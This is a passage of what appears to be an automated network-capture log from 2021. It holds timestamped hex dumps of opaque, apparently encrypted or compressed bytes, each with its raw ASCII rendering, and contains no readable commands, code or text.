58 18 c5 42 e8 bf d9 9b 2a 96 a6 a1 a8 7c f0 22 f3 e4 6b 28 98 e1 3b d3 58 64 6b b9 f3 ff ab 56 48 68 33 a3 11 fe d5 bc ed 80 29 21 e3 e2 87 53 6a fd 5f 1b 0a b8 9f a6 6e e8 74 22 17 2b 81 8a 77
                                                                                                              Data Ascii: PUq;sCus|2|=^6@icxq'XaT}W*A!NvRlK{bP#'6&=[s,tr[:s#6wGC>!YLE>NIOqrB5):=OXB*|"k(;XdkVHh3)!Sj_nt"+w
                                                                                                              2021-11-24 14:07:32 UTC166INData Raw: 9f 80 0b 4d 60 8b 7e 95 7b 18 3f 15 47 bd e9 a4 98 8b 7c a3 05 52 6f 52 59 bd 0a c1 ec 98 91 a8 8f 93 b3 e2 41 89 51 80 7f 3d 1d af 35 16 fe 8c 77 07 6e aa c4 99 ba e4 a1 1c a3 4f d9 32 81 43 8a 8e 0f 43 04 95 1d fb 94 a7 57 8f d2 ef 91 65 49 41 cc 99 a7 31 48 4f 3d bc e6 4b 76 24 7e 35 89 54 f6 bc 82 31 0c 25 b6 63 03 23 4f 41 46 b2 6f f6 bf 35 75 7b f0 8f df 42 07 76 b9 e3 53 40 40 e7 b0 b0 82 33 59 48 0d 8f dc bf b8 40 fd 78 72 1a 1d 54 31 5f 89 86 ec 72 a4 0c 20 be 4a 4b 4a 91 20 97 7b 59 83 ac 2a 0a 54 76 aa df 70 ed 3b 57 b1 62 ad 5a 7c 39 ec 05 9d 2a cb 1f ce 43 5f 34 ef f1 57 c4 53 ec 98 73 cb f3 5f df 40 54 c9 f4 0d 64 c6 d2 01 b8 88 23 3b c3 b7 fd df 81 43 de 10 56 fa 89 48 42 38 99 43 c8 3d 76 e5 b4 a4 ce ac ed 7e 44 2a 4e 20 1d 81 29 19 96 6c
                                                                                                              Data Ascii: M`~{?G|RoRYAQ=5wnO2CCWeIA1HO=Kv$~5T1%c#OAFo5u{BvS@@3YH@xrT1_r JKJ {Y*Tvp;WbZ|9*C_4WSs_@Td#;CVHB8C=v~D*N )l
                                                                                                              2021-11-24 14:07:32 UTC167INData Raw: d0 28 75 cc 83 93 b8 71 42 97 bf 51 80 8f 93 21 8f ce 43 2b 0b a2 77 76 3d e5 8d d3 11 6c 75 19 2b 81 d6 fa bd 65 b3 f0 c8 42 5c e7 5a 7b 16 9c 3c ac 12 79 2e fa 42 b4 bc 6c 38 6f 35 a7 71 23 d9 df 50 88 f0 e3 97 e4 b8 23 73 52 57 ba 15 f3 e3 cc 55 e2 6a f9 74 d5 0b ff 39 db bb ea 2e a5 df 1f bc 2a ee 79 24 11 a7 1b 00 7b c9 5a f2 5f bb cb b4 03 03 52 ce 2a a2 81 3f 5e 21 e1 48 49 19 f5 3b 54 06 54 6c c9 03 9c db d1 14 dd e3 62 fc 51 a8 f3 cd 0d 56 a2 dd 81 78 f6 d4 fd 2a 91 83 80 0c 09 69 20 b6 69 7b 88 a9 c4 44 a9 a2 4f 9d 6d 20 7d f7 9d 1e 16 a8 b1 3b 59 62 7a 17 51 99 05 b9 3c c8 d3 4a bc 14 9e 1b ad b4 13 f6 17 3d 9f f7 c1 35 46 43 d9 8b e5 6a 17 17 f9 c3 35 3d 67 87 e5 b1 41 d0 a5 9c da 3f 90 f3 0f 26 d1 81 63 86 14 cc 62 b8 dc f7 d7 6c 6a 85 db 76
                                                                                                              Data Ascii: (uqBQ!C+wv=lu+eB\Z{<y.Bl8o5q#P#sRWUjt9.*y${Z_R*?^!HI;TTlbQVx*i i{DOm };YbzQ<J=5FCj5=gA?&cbljv
                                                                                                              2021-11-24 14:07:32 UTC168INData Raw: a6 e2 38 fe 42 ef 6c 80 40 4e 30 78 d9 25 b5 9f 5c da c0 22 23 44 bd b6 43 f6 9e bf ef 30 1c 32 ce e5 67 4c e4 db 37 f2 91 6c ab 90 80 3f 03 da 6c 76 dc f8 f9 83 63 ec 19 7c b9 e0 93 63 a6 f6 87 15 03 03 dd 3b d1 a0 8a 29 ca 43 57 77 41 f1 02 88 0b dd 43 a9 46 ef 2a 8e 97 92 ac cc 54 cd 8d 5e ed 94 ff 5d d2 4e 31 5a 61 3b a2 ea fa 5b 08 9a 43 fb 70 e2 a4 6b fd 38 8e 99 39 bd 0d 59 0e d2 cf 2a 9e 72 6f c8 31 80 d7 51 1b 55 1b f8 2c a7 ac e7 47 d8 24 a1 e6 31 a0 09 68 57 8b 94 8e ac 0b 14 ee 8e 9a 04 a7 9a 7f 5e a6 fd 57 ed d3 e4 26 17 b2 8d 7a 35 34 98 65 82 b9 c9 af 9a d6 72 bd 6c d7 1c 51 e5 17 f8 b8 6a 49 5f 4c 2a 01 b0 fe 9e 72 89 a7 de f1 a8 6a 46 36 b5 d9 96 f8 7f 67 0e 25 15 25 7a d7 13 4e 6b b4 75 ae ef 70 cd ef e3 73 7e 81 65 00 9d 07 32 0f a8 75
                                                                                                              Data Ascii: 8Bl@N0x%\"#DC02gL7l?lvc|c;)CWwACF*T^]N1Za;[Cpk89Y*ro1QU,G$1hW^W&z54erlQjI_L*rjF6g%%zNkups~e2u
                                                                                                              2021-11-24 14:07:32 UTC170INData Raw: 12 b9 af 13 ad ae f5 e5 d1 ce fa a2 e0 df 16 10 b1 01 36 48 d3 f2 54 fa 16 c1 6f 9c 23 16 a1 0c aa 62 8d bb 77 52 a3 96 b2 16 0a 3a 3d 06 41 3e cc 2d 1d 5e 13 12 f7 83 42 89 d6 17 82 21 b5 ca fb 61 6e 9e a2 84 2d 1a 2d 17 51 3d bd 7a e7 da 78 e1 aa ea 22 25 7d e2 7e a5 44 6b ae 00 0a 34 8a 3a 31 a5 fa 7b 9a 53 f1 1e a9 c7 e1 74 20 e6 59 32 0c 1d 9d 76 8a da 18 a6 34 39 a4 8c fb ee 37 7e a1 cd 12 38 3a 99 d6 f0 69 93 5e f4 07 9a 13 01 25 d7 2e 2a aa 48 4d 64 4a f9 63 5f 76 6b 86 8a bd d5 0c 60 fc aa 05 9a 37 b0 c7 f1 c5 b8 aa a5 51 9c 08 54 ba 33 db dd c3 12 9a 66 51 a2 7d 2e 65 c3 c2 20 c1 40 b8 9c cd 51 4d c2 b0 b9 b5 a0 d2 dd d4 82 c7 ca d5 83 8a 48 77 85 a8 26 7c d9 28 f9 ad 47 54 e9 a7 c8 22 dd 7b a5 53 52 7f 9e 55 bc 3d a0 1f 18 2a d9 c5 56 fd ba b8
                                                                                                              Data Ascii: 6HTo#bwR:=A>-^B!an--Q=zx"%}~Dk4:1{St Y2v497~8:i^%.*HMdJc_vk`7QT3fQ}.e @QMHw&|(GT"{SRU=*V
                                                                                                              2021-11-24 14:07:32 UTC171INData Raw: 7e f9 87 f2 f1 33 14 9b 05 e2 03 97 1a 79 8b 47 ee c5 39 3b 4d 4b 68 3c 51 4f f0 f6 64 ac 3a 65 79 fb 37 86 23 4e 5a 4b d8 83 a6 0a 0d b2 dc fe e0 49 df 02 c6 86 a4 a0 2f df ee 87 31 aa d4 ad 8d 12 24 95 a9 08 a8 51 74 22 c0 3b 5a 4a 5d 7c b3 de ab e6 dd e2 dc b9 e3 d3 7b ca 1b 1c 91 bd 66 60 b7 c3 68 dd 62 59 3f 91 59 cc 14 27 f7 89 c5 86 a4 75 25 98 ae b7 b8 7a ef a0 ef 2d 37 36 27 9a 5b 3b f7 ed de fc 8f 24 ea 33 20 b2 c1 1c fe 38 58 d2 99 d7 19 ee 69 a0 5f a5 24 b5 24 22 20 99 6e 25 b1 33 8c 1f 70 76 dc d2 d5 36 19 f6 8a 1b d1 67 fb 01 70 05 eb e9 6f a9 27 59 0f 1f db a7 77 94 c1 50 3e fe d8 23 6e 8b ba 96 b3 d6 57 be a7 d6 42 60 ec b6 68 1b 0a 03 5c bd 3c c4 08 3e c7 b8 8b 0f 94 19 93 03 88 e5 9d a8 59 a3 fc 62 64 86 1d 69 60 ab cf 8c 46 b5 91 84 64
                                                                                                              Data Ascii: ~3yG9;MKh<QOd:ey7#NZKI/1$Qt";ZJ]|{f`hbY?Y'u%z-76'[;$3 8Xi_$$" n%3pv6gpo'YwP>#nWB`h\<>Ybdi`Fd
                                                                                                              2021-11-24 14:07:32 UTC172INData Raw: 9b 92 2c a9 e0 f0 78 cf 9c 56 32 71 41 11 41 71 b0 78 8b 11 74 cd 34 36 4b aa b9 a9 16 c4 44 3d 6b 10 7c a2 27 9c ec 25 79 5e a0 f2 8e 42 13 71 ca 36 02 e7 46 8a c5 d7 44 2a 5d f4 74 93 00 5d 39 18 6b 22 77 f3 88 66 17 ea 93 8b 2a 4e cb f0 7e 14 9b c2 84 c0 35 8e 0a 42 c0 3e 41 4d 29 5a 5d eb cf c8 4a 4d 8a 55 89 12 b3 0c 0c fc 6b e9 87 7e 7e a8 7f fd 4f fa 64 51 18 18 6e f2 d0 46 31 1f cf cc e8 54 76 95 c8 31 e1 9e 46 07 7c db df 04 b7 0f 22 b8 5a 59 28 e2 4d d9 44 88 11 98 2b b8 b3 4b 13 2a 35 6c da a1 f4 44 df 1f 57 7e 5c f3 ac fe 84 bd a5 9f 63 96 b2 39 74 f2 6b 98 e7 83 24 2e 2e e4 cd 37 70 3c 86 d9 8d 34 48 49 5e 06 70 a5 53 ad 28 e3 6a d5 6f 86 af 5c 54 08 6e 92 bb 38 ac 56 84 95 c8 35 d3 80 d3 27 bc 36 ff f2 e5 ce c8 ed 0e 19 0e b1 9b 30 92 82 cc
                                                                                                              Data Ascii: ,xV2qAAqxt46KD=k|'%y^Bq6FD*]t]9k"wf*N~5B>AM)Z]JMUk~~OdQnF1Tv1F|"ZY(MD+K*5lDW~\c9tk$..7p<4HI^pS(jo\Tn8V5'60
                                                                                                              2021-11-24 14:07:32 UTC173INData Raw: c1 72 b8 0d 24 28 c0 dc 9f f9 5d 60 87 58 38 a4 e3 c9 46 aa 24 2b b8 10 ab 5a 30 d9 ce a1 19 18 22 a8 72 98 a6 7a 23 29 8d 60 78 e2 64 f8 08 85 20 51 a4 cb 08 47 97 41 2d f7 ad 23 0e 95 28 50 5e 4e 63 66 36 77 4f df 3d bb 0b 68 c1 d2 57 be a6 e2 98 4a 77 78 7c 6a ab bc 87 e4 b9 87 4a e0 4a 28 ea bc 63 f4 e3 f3 54 2c eb 3e 13 08 a4 16 fa 2e b1 a7 c8 d4 9e 2b a9 32 7e ef 15 e4 5a 6b b7 d3 a9 7c e3 ad 3c 3e 25 24 10 03 c9 38 13 db e1 09 07 fd 1f e6 13 d7 45 0e 07 b4 03 2b 67 b0 b5 72 4e 38 60 e3 a7 f7 71 0d 67 39 48 0a 6b 2b b6 b5 6d fe 18 d2 0b 7e 22 5e a2 c3 c3 e9 52 d7 fb 18 29 d1 ef 4c d5 f6 b5 37 db e6 f8 d6 90 99 83 b6 24 78 1c c5 88 91 a4 17 9f 2f 29 3e 65 91 c6 9c c3 1f 97 e6 f3 28 85 b9 46 91 20 2c bc 7b 84 67 93 62 d9 29 c8 3d ff 84 29 c5 55 19 b6
                                                                                                              Data Ascii: r$(]`X8F$+Z0"rz#)`xd QGA-#(P^Ncf6wO=hWJwx|jJJ(cT,>.+2~Zk|<>%$8E+grN8`qg9Hk+m~"^R)L7$x/)>e(F ,{gb)=)U
                                                                                                              2021-11-24 14:07:32 UTC175INData Raw: dc 06 4b 05 5a 51 5a 5b cb 8a ba 31 1c a1 4e b4 d0 3c 45 90 b9 ea be 9f 26 bb fc 7e ad 93 38 27 51 de 35 f2 2b c5 38 12 34 8b f3 d1 bc bc 75 33 30 ea e2 92 01 3b c2 a3 e6 6e 15 48 49 c7 a4 3e 9b 8e 6a 4c 14 6e cf 12 94 89 13 93 30 e5 ea 7c 78 ef 84 75 a1 1b 8f c9 28 0b e6 90 3f a8 b8 53 7a 16 01 ca 8a 17 42 81 7f 0b df 69 9f a1 70 fd bd a0 58 5c 9a 2e 67 0c 33 f7 d1 15 00 52 f7 4a 15 6e 0b 1d 71 70 d9 52 ea ad 7b f3 b8 e4 6e 6d 8f 9f 5c 52 e3 73 1f 4d fb 3c f0 a0 04 cf 7c d5 63 04 b2 5a 9b 3f 82 61 9b 02 ec 8b 3b a2 3f d0 a6 8a 37 f8 6a 14 0a 3d b4 3d c0 05 35 5e 96 98 e3 b0 0c ec 52 3d f1 fb 4c af 7e 58 9d 77 18 47 30 39 af 62 b5 d0 b9 1e 89 f8 1d 77 f6 d2 c4 3b 4a 65 17 68 37 6a b7 94 d8 ee da 6e fc 50 df 21 81 c2 f4 59 a3 8b 8b 4b 65 0f 1e 71 25 00 05
                                                                                                              Data Ascii: KZQZ[1N<E&~8'Q5+84u30;nHI>jLn0|xu(?SzBipX\.g3RJnqpR{nm\RsM<|cZ?a;?7j==5^R=L~XwG09bw;Jeh7jnP!YKeq%
                                                                                                              2021-11-24 14:07:32 UTC176INData Raw: 62 eb e9 6b 4a 78 13 81 01 85 8b 13 66 7e e7 28 a1 84 0d 83 5c 42 6a ad 4b d1 45 a0 ec 9e 99 ca 4b 45 06 04 92 03 4a f3 49 1c 48 02 e1 ba d5 62 43 89 23 95 76 7c 9a f6 06 c6 9d 4f 7c 26 1e 18 e4 7d 91 00 fe 07 5b c8 36 38 54 2e 43 d2 19 e3 cd 52 55 ad e0 39 d0 0e 82 0e 69 60 1b b5 b5 2c 25 f0 9c f6 43 54 4d a7 c5 bb fa 4b 50 4b 32 88 41 b7 ee ba 36 72 c2 2d 3e 74 94 c0 2e 05 35 63 b1 bd 93 5d 94 cb 05 03 3a f4 fd 24 17 d1 0a b2 2d 9a b0 75 e1 8f 0a 11 5a d1 87 8e 1b 33 e1 2e a4 f4 86 a5 6e e9 25 17 52 a5 57 2d a2 f6 58 11 79 bf 0b de f1 25 68 a2 94 42 1c 1b 83 3f bd 22 9b 99 55 86 6b f0 0f a7 c4 f8 4a 1e 85 f6 fe 8a 39 78 40 35 e3 2a 9b 85 1c 92 5f 1d f6 f2 c7 5e 4d 71 9e a0 6f 7e 95 11 3b cb d4 e8 3c 27 11 99 59 a2 b4 1d d5 86 06 3c f9 2f 2a b5 45 34 9a
                                                                                                              Data Ascii: bkJxf~(\BjKEKEJIHbC#v|O|&}[68T.CRU9i`,%CTMKPK2A6r->t.5c]:$-uZ3.n%RW-Xy%hB?"UkJ9x@5*_^Mqo~;<'Y</*E4
                                                                                                              2021-11-24 14:07:32 UTC177INData Raw: d1 d8 e3 25 db 47 61 9d ac 68 3f 62 22 93 26 1e 06 8d 60 dd 68 f7 a6 1e 50 f2 e5 81 81 03 e7 56 7f 78 cc e8 e7 25 e8 cf 83 15 f7 0e 25 11 60 62 60 24 03 fb 93 26 1b 73 13 a0 6c cf e1 86 48 87 8b ea cf e2 ae 46 f3 37 b4 52 79 1c 4a 2f 49 e8 57 28 02 58 3b 34 c3 ea d0 17 b0 43 fc 88 c3 e7 46 a5 e9 42 e5 4b 01 fa a5 b2 48 16 e6 cc 7d b9 68 55 3c 53 a1 40 67 67 d3 8c 3a 8e 41 23 e6 d9 85 90 d6 c8 6c 58 74 77 69 6f 14 7e 6b 6c ef 24 21 f8 48 cd 18 f0 80 c6 af eb 94 26 24 23 86 70 e6 2f 39 e2 94 8b 60 f5 54 33 0e 93 99 ee 0c 75 7d 5e de de 5c d9 76 fb e3 0f 56 f3 80 03 b8 c2 33 00 d3 4a bc 94 2f 4c 4a 67 42 19 7c d4 24 ea 94 7f b5 92 bb 40 cd b1 ae d0 f2 67 23 d2 02 2c 4d 83 fd fd 1a fc b7 4e 7e 6f 86 52 c2 7d 54 45 60 d2 ba e8 c5 17 3e 68 96 46 42 c6 5a e2 0c
                                                                                                              Data Ascii: %Gah?b"&`hPVx%%`b`$&slHF7RyJ/IW(X;4CFBKH}hU<S@gg:A#lXtwio~kl$!H&$#p/9`T3u}^\vV3J/LJgB|$@g#,MN~oR}TE`>hFBZ
                                                                                                              2021-11-24 14:07:32 UTC178INData Raw: f8 b5 eb ec b8 6e ed 03 e0 a6 de 2a a3 8d 57 c0 d7 63 bd a5 45 58 e1 bd 74 05 a6 26 27 9e d1 82 57 37 62 36 b9 09 9d 6b 5b df d0 d5 76 06 b7 1c b7 4b 9a 36 f8 e8 9f ed 98 2c 47 56 48 ca cd 56 cb 05 d8 7b 69 e8 42 fc d2 0d e4 47 32 3f 86 86 f2 c4 cf dc dd 0a bd 72 0a 3f 08 15 5e c3 52 0a c9 44 33 d3 63 36 1c e1 5f 3b d5 a9 61 e4 59 fb c3 37 bc d3 89 a8 c6 10 4e f5 8f 7f ac b6 fa 8d fb b6 ae 11 51 7a 2c cb 45 21 f7 75 f3 d7 27 e4 05 e6 ee 95 10 c0 e5 55 05 84 20 33 88 4f a3 e8 85 79 97 59 a4 82 11 80 be ec 56 28 a8 8f 8f 49 78 8f 77 14 de d7 ec 69 c8 28 61 fc f2 2c fa d3 d4 d7 89 b3 65 f1 76 e0 6a 02 00 b9 cf 8a eb 09 20 35 70 37 2b c4 8c 65 7b 6f 13 10 5d 97 c8 6d 00 04 40 dd 47 6c df ac 62 16 e0 9b 1a c9 dd e7 01 e7 15 15 c6 c1 dc 3c 3e c6 fd 62 0e 7b 04
                                                                                                              Data Ascii: n*WcEXt&'W7b6k[vK6,GVHV{iBG2?r?^RD3c6_;aY7NQz,E!u'U 3OyYV(Ixwi(a,evj 5p7+e{o]m@Glb<>b{
                                                                                                              2021-11-24 14:07:32 UTC179INData Raw: 7a 55 de 9b 03 4f 24 3a d4 f2 86 89 1a fd 0d 07 e9 04 3d 45 e0 3e ba 13 ff 48 a1 6d ea 9f bb 7a 2b 2b d9 aa ad 29 37 7d be 98 d3 1f 97 89 73 9b a5 06 90 33 41 88 f6 22 1b f4 03 88 82 12 75 8f 0a 55 6f c9 13 18 f4 3e 89 d2 4b 79 0a 03 4f f3 c8 80 c4 05 88 81 f2 54 96 a6 8d c4 f1 f3 75 b9 33 6a 83 62 87 b8 42 7c 88 3f cb 12 f6 2c 45 c8 e8 17 7e 7c 0d 27 0b c4 37 07 f0 e8 17 d4 b0 bc 95 2e d7 7a 1a 8e 0d 64 08 a3 bb ee cb e4 c1 d5 d1 0d ab 89 61 d2 4f 90 14 1c 31 4b 31 b8 66 4e d2 96 4b 73 b1 c9 36 26 54 91 ce 4c 84 00 aa 4f 02 97 ad 84 98 cf 55 4e d3 ea 4a 40 07 8a 52 eb 0f 40 ab f2 fd 3d fc 40 3a 98 13 aa 3d c2 0b 0b d6 19 a3 40 9b 2a 35 a1 35 11 b6 59 c6 8e b0 41 4b f4 8c aa a4 fe dc 84 a6 ca f4 ba 15 15 93 e9 57 09 23 92 6e f1 c9 71 de cb 8c 25 c2 64 35
                                                                                                              Data Ascii: zUO$:=E>Hmz++)7}s3A"uUo>KyOTu3jbB|?,E~|'7.zdaO1K1fNKs6&TLOUNJ@R@=@:=@*55YAKW#nq%d5
                                                                                                              2021-11-24 14:07:32 UTC180INData Raw: 43 d4 ec d9 16 ad 4e 77 2a dd de f6 98 16 a5 bc 61 c5 fb d6 6d f8 a2 24 74 94 73 b3 09 15 af 92 1f a5 5c 89 0d 5a 41 dc 4b 4c ae 41 6f ca 0f 7d 58 93 46 82 a7 b3 f6 a2 3d 6e 39 24 56 06 3b 91 fa 6d 30 ba d6 e0 76 23 19 ec c6 51 cc 33 0a 66 c5 97 06 ba 8c 2f 09 57 a4 06 a4 9b a6 93 2b 97 f5 3c 41 d3 68 dc 61 55 46 ff a4 54 0a 08 d4 37 48 a7 a6 a1 36 10 af c1 75 37 69 45 2b 1a 83 8f 24 f7 5b 92 af e8 9d 1a bf 01 0b 44 57 b3 ec 8f b9 fe 70 cc 0e 75 e9 4e c3 ca e4 4c f0 b1 2a 76 84 e1 b5 c3 76 96 37 1b bc ae e0 04 6c 8c 6b ed db 86 3a bf 06 f6 e5 df a0 4d bb 8d dc 15 dd 07 54 70 9e 0e 8b 79 2f d4 9c 9d 23 0c e9 f5 05 a4 f9 70 e6 5a 42 05 e7 9b e1 00 b9 77 74 32 13 b2 e8 84 23 e8 09 90 05 b2 06 1f 47 80 17 ac 87 2d c7 46 2b 3b ef f1 bb 10 70 d7 ce 60 a7 5e 0f
                                                                                                              Data Ascii: CNw*am$ts\ZAKLAo}XF=n9$V;m0v#Q3f/W+<AhaUFT7H6u7iE+$[DWpuNL*vv7lk:MTpy/#pZBwt2#G-F+;p`^
                                                                                                              2021-11-24 14:07:32 UTC182INData Raw: dc 02 61 9e 28 83 26 55 f1 c2 e3 7d ee b3 6a 81 3b 5e cd c0 16 f0 a3 ad 8e 01 2e 29 6b e3 c2 f4 9f b9 f2 d5 b8 af 86 35 bb 71 70 03 f0 c6 4f df 46 c0 99 58 50 41 d9 1f 63 65 d6 90 f6 0e d3 14 58 65 6d bb 90 ad ae 90 8f 3d b3 76 df 07 e6 66 4e 86 d2 79 86 25 d4 44 57 68 b6 d4 66 7c 23 c3 7f a0 9b 67 70 96 b8 9a 9a c8 a5 ca 5b 60 95 6a f9 cd 60 7c 6c 90 1b ca 05 ca 09 c9 37 78 03 ae be 65 f8 2f 9a 83 f4 ea f8 f3 a7 41 c8 f3 ab 0e 2c fa 75 22 92 43 0f e6 29 4e 98 9b f4 14 be fd 73 36 40 8b 25 7a 49 5f 18 78 33 d6 79 6a 42 ff 6e ec f9 b9 48 03 4b 39 15 87 8a 00 36 9d 65 3e 0b 9b 5d 9c 44 98 d1 3b 73 dd f6 c9 f8 fc 7c b2 1f ea 35 e2 ce ad ab 7b 23 ae 0f 86 1a 6d 18 3b fc 47 6b 7b 91 7c 57 0c e6 a1 a2 16 27 72 a0 cf 20 09 e0 e5 1e 99 a0 6f c6 61 8d 30 47 25 0b
                                                                                                              Data Ascii: a(&U}j;^.)k5qpOFXPAceXem=vfNy%DWhf|#gp[`j`|l7xe/A,u"C)Ns6@%zI_x3yjBnHK96e>]D;s|5{#m;Gk{|W'r oa0G%
                                                                                                              2021-11-24 14:07:32 UTC183INData Raw: d2 d9 46 73 b2 55 66 e5 06 48 1b 2e f8 03 5d b7 83 16 19 44 53 45 1e b2 49 be 2d d4 71 4c 5e 93 e3 c8 72 57 04 af 8f da d9 d3 d6 48 81 83 6e ee ba ca a7 73 d2 ab 34 2a 89 04 21 a5 a7 d6 79 05 d4 a2 41 af 9b ff f0 9d 88 1c 0f 03 c5 e4 b7 ce 13 51 0f 44 22 1a 47 8c 6c 62 77 ac 92 53 ac 96 dd 36 9e f4 81 68 89 bd 17 ed 3c 88 28 02 8d 4c 15 fb df 55 4d 1f 39 fa a4 9b de 73 9d a5 40 ec 80 68 34 92 f8 7c fc 72 11 23 8e 61 47 c3 c8 6d 82 d7 36 e8 78 dc dc a0 36 b0 c8 2b 2a f7 8e ea b9 ac 37 91 2e a6 4d aa 17 45 3b e2 96 d6 00 bc 57 2f 31 94 f3 3b e1 b2 f5 35 50 9f 47 c4 f3 b3 63 21 43 a6 a3 2f f1 47 78 98 db 94 9b a9 8f 95 a1 62 d8 81 24 17 b1 44 19 17 ac 0a fa 77 1d 69 86 68 ab 33 6f 0a 4d 55 3f db 2d 51 68 5c ee c0 6a 80 d5 b4 2b dd 52 8f 84 b1 c1 4c d7 e3 17
                                                                                                              Data Ascii: FsUfH.]DSEI-qL^rWHns4*!yAQD"GlbwS6h<(LUM9s@h4|r#aGm6x6+*7.ME;W/1;5PGc!C/Gxb$Dwih3oMU?-Qh\j+RL
                                                                                                              2021-11-24 14:07:32 UTC184INData Raw: 32 24 8c 67 4b 33 f0 c5 53 22 f3 f8 b5 78 65 65 0c f3 13 16 13 52 eb 7d 47 b4 a5 c9 1d 95 be 85 10 38 e7 ca 06 4e 21 e3 1e 9a bc a2 f6 0c 13 0d b5 7b f0 5b 23 c2 bc 6d e4 6c c7 ad 12 22 fa d5 4c 4d 94 10 d4 1a 92 55 5a f1 98 46 1d 30 1f 3c 59 f4 4a e0 ba df bd cc 61 f6 5d 68 bc 88 04 27 18 12 13 ee 1e d1 29 9e c6 74 60 f1 41 ff 02 45 c1 d1 88 74 8b c9 f4 6c 80 64 5e cd f5 c9 da 4b 30 7e d2 d2 12 a8 c9 c5 62 25 0d d4 2e 05 cb 41 cf f9 de 77 fc fd 09 06 4d 22 23 cc 67 e8 fd 99 3d f9 c2 0b 6e 70 fc ba 3d 58 96 b4 16 a0 2f b0 08 f3 a2 31 bb fb a2 2f c1 b5 8f 7b c6 ef 79 8c 42 02 59 f0 df 2c d3 1b 1e b1 6a a0 8d 53 da 9e da 1d e2 ca 6c c1 ec 04 8e f1 b5 50 0a dd 01 be 7c ec 12 e3 4d 8f 3c 9f 0f b3 f5 86 5c f0 d3 51 44 37 d9 c6 22 f1 a3 b4 a7 c3 5d d3 a2 b1 38
                                                                                                              Data Ascii: 2$gK3S"xeeR}G8N!{[#ml"LMUZF0<YJa]h')t`AEtld^K0~b%.AwM"#g=np=X/1/{yBY,jSlP|M<\QD7"]8
                                                                                                              2021-11-24 14:07:32 UTC186INData Raw: ec 68 9e 79 81 b8 d2 18 6d a2 47 ab 72 14 6b 8f 59 f7 86 fe 46 5f 75 49 b9 34 46 b7 42 aa 96 c5 47 ee 7f 3f b4 54 34 59 64 d5 48 fd c4 5f ba be 39 96 58 af f5 4b fb 03 9a dc 24 86 16 af df f7 d7 37 d8 0e ad b7 fe 4f 52 0a 86 ba b9 96 f8 a5 2f fa 40 71 2e 10 53 7f 2d 47 67 d5 93 60 a8 3f 7d 12 50 c8 24 f5 47 94 a4 ef 4b a1 75 5e 6c 9f 77 ed c7 d0 a2 29 a0 90 86 22 21 0d f4 eb 2a 51 12 63 c8 4c d5 e7 b4 14 01 99 ab 7e 91 7e 80 f1 d2 ef 08 09 01 e6 8d 1c b0 29 f7 12 3e 8e 0f c1 50 5e 63 ec cb e1 56 96 61 a8 ca 4c 4e a2 f8 62 40 11 28 b1 ae ca 29 2c 9a 39 fd 4a aa d3 3d 2e eb b0 64 c7 58 39 e9 b2 ff d5 45 e7 6d e2 61 99 6f bc f8 49 1e 8c ac 5d f6 38 91 8a 15 46 ad 3b 40 fa c4 aa 6f 49 be 28 ff 76 f3 63 f9 2d 31 86 6f e5 a2 ce 47 6f 0d 57 ef 05 05 e1 35 94 6e
                                                                                                              Data Ascii: hymGrkYF_uI4FBG?T4YdH_9XK$7OR/@q.S-Gg`?}P$GKu^lw)"!*QcL~~)>P^cVaLNb@(),9J=.dX9EmaoI]8F;@oI(vc-1oGoW5n
                                                                                                              2021-11-24 14:07:32 UTC187INData Raw: 96 83 21 ef 0e 68 4c 7f f3 a6 cd b8 77 96 07 36 87 49 0e 41 b6 aa b5 67 9b e1 65 aa ca b0 93 9f c0 35 d6 8c f0 d1 62 d5 e0 1c fb 88 d5 3d 54 f0 f0 b7 63 ce 0f 6f e0 98 03 95 64 90 e5 e8 18 2c a2 66 11 ab 6b 25 aa 34 67 54 0d ce 07 7b 96 9f ba b2 15 51 2e 74 00 ab e6 01 cb d3 e7 86 f5 e9 b1 6e 5d 08 54 55 d7 cd a9 98 57 86 08 70 dd 3b 23 d7 27 5d 76 c9 f8 35 a4 23 9c e0 28 4d ee ca 3e 7a 9a c6 ea 48 10 c6 f4 fb 7e 9e 64 42 5b 8c 4c ec fe 52 61 d9 8f 39 1e b1 9f a3 3e 81 23 ea 6d 11 9b 2e 89 30 ca 03 64 01 da ec 29 54 05 3e 75 5a 11 58 b5 ca 29 b6 07 0f 3c 1c ae 11 92 bf cb 6a b2 d9 7a 24 ef ed c6 f3 e3 ae aa 2f 1e 70 85 a8 ef 4e dc d9 84 3d 82 d6 8b a7 8c c9 e8 11 12 5d 8d cd 1e d1 86 59 17 f5 29 27 8c 23 ff 8f 93 91 00 ee 7b 20 7f 8b b7 3c 7e 43 49 7c fa
                                                                                                              Data Ascii: !hLw6IAge5b=Tcod,fk%4gT{Q.tn]TUWp;#']v5#(M>zH~dB[LRa9>#m.0d)T>uZX)<jz$/pN=]Y)'#{ <~CI|
                                                                                                              2021-11-24 14:07:32 UTC188INData Raw: d6 0e 38 d7 f9 f8 a1 4c 7f 3b 20 ab 60 b2 0c b7 cd 50 93 3e b6 cf 91 27 cc 00 3f d1 20 4c d9 3b 9e f6 b0 48 06 37 91 0f b0 76 83 57 4e 30 7b 45 19 bd 11 c9 09 3c b2 10 b5 d7 2f ae 8e bb c5 08 e5 68 9c 22 a4 ba c0 a1 44 82 c8 67 5f 4c 88 c6 3a 62 d0 ee cd 06 d8 5e ff 5b 1d a2 25 e3 90 6c ad 5a 25 02 90 35 96 4c 5a 94 22 9e c3 15 3a de da 29 a1 4b b6 0d 32 0a 4d d8 62 3b 5f dc 86 8b 63 92 4b f3 ce 9d e5 6a a5 f6 a7 21 69 65 d4 e8 fb 2c f4 ef 72 fc e9 35 da 24 fb 58 4a 78 d5 64 f1 3b 93 77 f1 9f fa cc 7a 11 3e 62 1b 30 cf 2c 53 94 fe 1b da 08 17 95 4e e9 2a a1 97 03 ba 98 3e b8 e3 ab 24 75 fa c6 c8 61 a3 c6 88 23 9e 81 2e 50 c9 54 73 a2 3b 65 64 8e 6c d9 67 16 68 30 53 dd 74 b4 e7 d4 39 7b 05 0e e3 16 0b 24 9b 19 d5 72 f3 d5 d1 c1 76 3f 8a 64 bf 61 02 f2 7b
                                                                                                              Data Ascii: 8L; `P>'? L;H7vWN0{E</h"Dg_L:b^[%lZ%5LZ":)K2Mb;_cKj!ie,r5$XJxd;wz>b0,SN*>$ua#.PTs;edlgh0St9{$rv?da{
